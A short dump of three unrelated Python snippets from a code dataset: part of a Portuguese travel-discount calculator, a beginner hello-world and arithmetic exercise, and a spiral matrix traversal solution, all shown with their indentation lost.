media = liquido/viajantes
elif categoria == 'PRIMEIRA CLASSE' and viajantes >= 4:
desconto = bruto * 0.20
liquido = bruto - desconto
media = liquido/viajantes
print("O valor bruto da viagem é de R$ {:.2f}.".format(bruto))
print("O valor do desconto para {} viajantes na categoria {} é de R$ {:.2f}.".format(viajantes, categoria, desconto))
print("O valor líquido da viagem é de R$ {:.2f}.".format(liquido))
print("O valor médio por viajante é de R$ {:.2f}.".format(media))
|
def print_hello_world():
print('Hello World!')
def my_print(msg):
print(msg)
# my_print('Hello Cyber!')
def add(a, b):
return a + b
a = 5
b = 3
print(f'the sum of {a} + {b} is {add(a,b)}')
c = 7
if add(a,b) > c:
print(f'{add(a,b)} is greater than {c}')
elif add(a,b) > 10:
print(f'{add(a,b)} is greater than 10')
else:
print('Other')
for i in range(10):
print(i * 10)
|
class Solution(object):
def spiralOrder(self, matrix):
if not matrix:
return []
t, b, l, r, d = 0, len(matrix) - 1, 0, len(matrix[0]) - 1, 0
res = []
while t <= b and l <= r:
if d == 0:
res.extend(matrix[t][l : r + 1])
t += 1
elif d == 1:
res.extend(e[r] for e in matrix[t : b + 1])
r -= 1
elif d == 2:
res.extend(matrix[b][l : r + 1][::-1])
b -= 1
elif d == 3:
res.extend(e[l] for e in matrix[t : b + 1][::-1])
l += 1
d = (d + 1) % 4
return res
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.